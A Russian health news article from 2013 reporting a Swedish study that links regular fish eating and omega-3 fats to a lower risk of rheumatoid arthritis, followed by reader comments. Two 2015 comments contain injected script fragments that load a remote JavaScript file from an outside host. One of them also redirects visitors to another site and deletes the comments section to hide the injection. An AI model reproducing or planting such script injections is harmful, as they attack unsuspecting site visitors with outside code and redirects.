Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Рыба спасет вас от артрит...  >>  Рыба спасет вас от артрита
 
Обратная связь
 

Рыба спасет вас от артрита

Размер шрифта
16 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ранее в многочисленных исследованиях было показано, что жирная рыба полезна для здоровья сердца. Теперь же ученые выяснили другой интригующий факт: оказывается, она защищает ваши суставы от воспаления.

Рыба спасет вас от артрита

Достаточно раз в неделю есть жирную рыбу (такую, как лосось) или четыре раза – рыбу более постную (например, треску), чтобы снизить риск развития ревматоидного артрита в 2 раза.

Исследование было проведено на базе Каролинского института (Стокгольм, Швеция), в нем приняли участие 32 тысячи женщин. Они заполняли специальные анкеты, в которых особое внимание было уделено вопросам, касающимся диеты. Опрос охватывал значительный промежуток времени – с конца 80-х до конца 90-х годов XX века.

Выявленное благоприятное влияние рыбы на здоровье суставов имеет вполне ясную интерпретацию (хотя она все еще носит гипотетический характер). Ученые считают, что благодарить следует омега-3-жирные кислоты – полезный класс жиров, который как раз-таки содержится в морской рыбе. Эти жиры обладают мощным противовоспалительным эффектом, подавляя чрезмерную активность иммунной системы.

При ревматоидном артрите эта замечательная особенность приходится особенно кстати. Ведь при этом заболевании сустав разрушается именно по причине неадекватной функции иммунитета. При этом человек страдает от боли, а сустав постепенно деформируется. Ревматоидный артрит намного чаще встречается у женщин, чем у мужчин.

В целом, результаты, полученными шведскими учеными, выглядят очень многообещающе, но есть некоторые нюансы.

Во-первых, существуют различия в демографической картине в Швеции и других странах, что может стать причиной расхождения результатов. Во-вторых, несмотря на то, что вклад курения (важнейшего фактора риска!) оценивался, проанализировать этот аспект с математической точностью не представляется возможным. В-третьих, были получены крайне неоднозначные результаты по биологически активным добавкам, содержащим омега-3 (к таковым относятся, например, всем нам известные капсулы с рыбьим жиром). Ученые связывают это с тем, что в Швеции эти добавки очень непопулярны, поэтому трудно выявить адекватную связь между их употреблением и риском ревматоидного артрита.

Но в любом случае, эксперты сходятся во мнении, что рыба обязательно должна присутствовать в вашем рационе. Конечно, не на каждодневной основе, но один или два раза в неделю – безусловно.

Данное исследование было опубликовано в журнале «Анналы ревматологии» (Annals of the Rheumatic Diseases).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

15 ноября 2013 в 20:26

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какая рыба спасет от рака? Ученые узнали – узнайте и вы!   Посмотрите в свою тарелку! От еды зависит, будет у вас маразм или нет   Что же есть весной, чтобы чувствовать себя хорошо весь год?   Вас обманули! Никакие браслеты не помогают от артрита  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Еда против рака. Часть 1
Чем накормить мужчину для эрекции
Что можно и нельзя при болях в колене

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.